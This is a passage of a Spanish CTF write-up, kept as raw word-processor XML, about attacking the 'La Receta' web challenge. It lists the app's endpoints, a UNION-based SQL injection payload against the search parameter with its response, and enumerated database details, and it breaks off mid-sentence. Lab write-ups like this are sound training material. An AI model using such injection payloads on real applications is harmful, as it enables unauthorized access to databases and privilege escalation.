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ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Pentraze CTF — La Receta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Categoría:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dificultad:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fácil</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Estado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resuelto</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fecha:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15 de octubre de 2026</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tecnologías identificadas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Node.js, Express, PostgreSQL 15 y JWT</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilidad:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection con ejecución de sentencias apiladas (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stacked Queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalada de privilegios y obtención de la flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>1. Descripción del desafío</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La Receta es una aplicación web donde los usuarios pueden registrarse, iniciar sesión, configurar sus perfiles y buscar otros chefs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>El objetivo del reto era acceder al panel administrativo y recuperar una receta secreta representada mediante una flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La aplicación exponía varios endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /api/register</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /api/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/chefs/search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/admin/flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Este último requería un token JWT válido correspondiente a un usuario con rol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>2. Reconocimiento inicial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El análisis del código JavaScript público, disponible en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/app.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, permitió identificar el funcionamiento del registro, la autenticación y el panel administrativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>En el código fuente apareció una pista especialmente importante:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>// Chef search (vulnerable: sort param → /api/chefs/search)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La aplicación permitía buscar usuarios y ordenar los resultados mediante tres parámetros:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: término de búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: columna utilizada para ordenar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: dirección ascendente o descendente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se decidió investigar el endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/api/chefs/search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>3. Identificación de SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se comprobó una inyección SQL basada en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mediante el parámetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT NULL,'sqli_confirmada',NULL,0-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Respuesta obtenida:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{   "chefs": [</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"id": null,</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"username": "sqli_confirmada",</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"display_name": null,</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"recipes_count": 0</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 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Esto confirmó que la entrada del usuario podía modificar la consulta SQL y que el resultado expuesto contenía cuatro columnas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>También se identificaron las siguientes características de la base de datos:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="3878"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2113"/>
        <w:gridCol w:w="1765"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Elemento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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Motor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765"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PostgreSQL 15.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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Base de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765"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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>la_receta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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Usuario SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765"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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>app_la_receta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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Tabla identificada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765"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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>public.chefs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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Cuenta administrativa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765"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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>rtavarez</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La cuenta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
